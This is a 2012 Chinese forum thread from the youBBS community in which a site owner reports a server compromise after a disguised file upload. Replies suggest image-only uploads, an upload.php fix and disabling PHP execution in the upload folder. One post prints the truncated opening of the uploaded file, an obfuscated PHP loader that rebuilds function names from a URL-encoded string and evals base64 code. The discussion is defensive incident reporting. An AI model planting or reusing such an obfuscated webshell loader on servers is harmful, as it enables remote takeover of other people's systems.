momofa
momofa
4944 10 0

大家用这个程序别开放上传 昨天我的服务器被黑了!

有人传了一个以.bad-jpg为后缀的文件上去 然后晚上我服务器就登不上去远程桌面了
今天让空间商重置密码了 上去后发现多了些莫名其妙的文件
“苹果FTP批量扫描.rar”之类的。

0

See Also

Nearby


Discussion (10)

palese
palese 2012-12-05 01:30

设置限制附件类型了吗?

0
crll
crll 2012-12-05 01:30

.bad-jpg 后缀能利用么? - -!

0
crll
crll 2012-12-05 01:32

FTP批量扫描 在服务器在自用电脑上面用 应该都是一个效果吧。

0
admin
admin 2012-12-05 01:42

这个问题设计之初不存在,
参见 https://www.youbbs.org/t/74https://www.youbbs.org/t/92
个人建议只开放图片上传,修改一下upload.php 就可以。

0
ego008
ego008 2012-12-05 01:59

.bad-jpg 是用户上传一个后缀名为jpg而不是一个“合格”的jpg文件,因而会被重命名,为bad-jpg,顾名思义。管理员以后看见这个最好直接删掉该附件,(看来以后可能要添加删附件的功能)

0
momofa
momofa 2012-12-05 02:09

@admin @ego008 那个文件里的内容是这样的
<?php // MYSQL
$OOO0O0O00=FILE;$OOO000000=urldecode('%74%68%36%73%62%65%68%71%6c%61%34%63%6f%5f%73%61%64%66%70%6e%72');$OO00O0000=93780;$OOO0000O0=$OOO000000{4}.$OOO000000{9}.$OOO000000{3}.$OOO000000{5};$OOO0000O0.=$OOO000000{2}.$OOO000000{10}.$OOO000000{13}.$OOO000000{16};$OOO0000O0.=$OOO0000O0{3}.$OOO000000{11}.$OOO000000{12}.$OOO0000O0{7}.$OOO000000{5};$O0O0000O0='OOO0000O0';eval(($$O0O0000O0('JE9PME9PMDAwMD0kT09PMDAwMDAwezE3fS4kT09PMDAwMDAwezEyfS4kT09PMDAwMDAwezE4fS4kT09PMDAwMDAwezV9LiRPT08wMDAwMDB7MTl9O2lmKCEwKSRPMDAwTzBPMDA9JE9PME9PMDAwMCgkT09PME8wTzAwLCdyYicpOyRPTzBPTzAwME89JE9PTzAwMDAwMHsxN30uJ 此处省略上万字符。

0
ego008
ego008 2012-12-05 02:15

@momofa 用第三方存储也是个不错的选择。

修改 https://github.com/ego008/youbbs/blob/master/upload.php#L177 不是正确图片的不保存。

0
lllllll
lllllll 2013-03-17 14:45

@admin 链接失效了。。

0
root
root 2013-03-21 12:51

你把上传目录的Php执行权限去掉就可以了

0
Login Topics